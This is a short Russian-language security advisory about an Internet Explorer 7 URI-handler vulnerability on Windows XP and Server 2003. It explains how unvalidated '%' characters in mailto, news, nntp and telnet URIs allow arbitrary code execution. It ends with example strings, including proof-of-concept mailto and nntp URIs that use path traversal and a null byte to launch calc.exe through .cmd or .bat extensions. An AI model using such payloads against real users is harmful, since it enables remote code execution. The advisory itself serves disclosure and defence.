Программа:
Microsoft Internet Explorer 7.x
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в обработчиках URI при проверке системных, используемых по умолчанию URI (например, "mailto", "news", "nntp", "snews", "telnet"). Атакующий может обманным образом заманить пользователя на специально составленный сайт, содержащий, например, "mailto" URI с символом "%" и заканчивающийся определенным расширением(например, ".bat", ".cmd") что приведет к выполнению произвольного кода на целевой системе.
Успешное эксплуатирование уязвимости требует наличие установленного в системе Microsoft Internet Explorer 7.
Примеры:
mailto:test%../../../../windows/system32/calc.exe".cmd
telnet:// rundll32.exe url.dll,TelnetProtocolHandler %l
news:// “%ProgramFiles%\Outlook Express\msimn.exe” /newsurl:%1
nntp:// “%ProgramFiles%\Outlook Express\msimn.exe” /newsurl:%1
snews:// “%ProgramFiles%\Outlook Express\msimn.exe” /newsurl:%1
mailto:// C:\lotus\notes\notes.exe /defini %1
nntp:%00/../../../windows/system32/calc.exe”.bat
